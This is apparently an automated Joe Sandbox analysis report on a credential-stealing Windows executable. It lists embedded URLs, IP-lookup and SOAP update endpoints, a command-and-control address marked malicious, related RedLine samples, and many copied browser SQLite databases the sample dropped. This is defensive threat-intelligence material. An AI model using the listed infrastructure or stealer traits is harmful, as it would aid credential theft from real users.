http://www.typography.netD	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://185.222.57.84:55615t-	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://www.galapagosdesign.com/DPlease	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://tempuri.org/Endpoint/GetUpd	chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com&	chTJmCR9bS.exe, 00000000.00000002.1827165764.00000000062F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itcfonts.k	chTJmCR9bS.exe, 00000000.00000002.1827118138.00000000062DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.57.84	unknown	Netherlands		51447	ROOTLAYERNETNL	true
104.26.12.31	api.ip.sb.cdn.cloudflare.net	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1594596
Start date and time:	2025-01-19 13:01:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	chTJmCR9bS.exe renamed because original name is a hash value
Original Sample Name:	963F526636C53E9ECF5AF8025E0DACA0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/43@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 116 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 184.28.90.27, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:02:08	API Interceptor	41x Sleep call for process: chTJmCR9bS.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.31	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	ip.sb/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	VM-849541.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	deploy.ps1	Get hash	malicious	DanaBot	Browse	172.65.251.78
	deploy.ps1	Get hash	malicious	Unknown	Browse	172.65.251.78
	PgOfRNLIVK.exe	Get hash	malicious	LummaC, Amadey, Babadeda, GCleaner, KeyLogger, LummaC Stealer, PureLog Stealer	Browse	104.21.112.1
	https://nam.dcv.ms/TgEkOrA6UC	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://nam.dcv.ms/TgEkOrA6UC	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://oxtzgomhodrz.top	Get hash	malicious	Unknown	Browse	172.67.185.180
	https://store.redeemwalletscode.com/redeemwalletcode/gift/307603441	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://cdn.trytraffics.com/rdr/YWE9MzYwNzU4ODI2JnNlaT0zMDQxNjIyMiZ0az1tWW9iTU9UQlE2RXh3dE9hZnJZTyZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://cdn.trytraffics.com/rdr/YWE9MzYwNzU4NTE0JnNlaT0zMDU2MjM5OCZ0az1VRE1JQWhncE83NWdNZ2lSdDV1dCZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=	Get hash	malicious	Unknown	Browse	188.114.97.3
ROOTLAYERNETNL	RFQ.exe	Get hash	malicious	Quasar, PureLog Stealer	Browse	185.222.57.67
	p0GiAimtNm.exe	Get hash	malicious	RedLine	Browse	185.222.58.237
	nzLoHpgAln.exe	Get hash	malicious	RedLine	Browse	185.222.57.76
	ljMiHZ8MwZ.exe	Get hash	malicious	RedLine	Browse	45.137.22.250
	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	K3xL5Xy0XS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	Invoice-BL. Payment TT $ 16945.99.exe	Get hash	malicious	RedLine	Browse	45.137.22.164
	MfzXU6tKOq.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.82
	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229
	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HMPjSwlux3.exe	Get hash	malicious	Quasar, SugarDump	Browse	104.26.12.31
	pcOsVBMQDB.exe	Get hash	malicious	Quasar	Browse	104.26.12.31
	Quote - 840 Tons of Reinforcing Steel.jse	Get hash	malicious	MassLogger RAT	Browse	104.26.12.31
	csso.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.12.31
	OUTSTANDING PAYMENT REQUEST.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.31
	SWIFT COPY.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.12.31
	hrB6qa0jOz.bat	Get hash	malicious	MassLogger RAT	Browse	104.26.12.31
	Copia Pagamento Intesa_Sanpaolo_pdf.bat	Get hash	malicious	MassLogger RAT	Browse	104.26.12.31
	PO202501F.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.12.31
	shipment details.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.31

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp116D.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp116E.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp117F.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp118F.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1190.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp11A1.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp11B2.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp11B3.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp11C3.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4B05.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4B15.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4B26.tmp

Download File

Process:	C:\Users\user\Desktop\chTJmCR9bS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
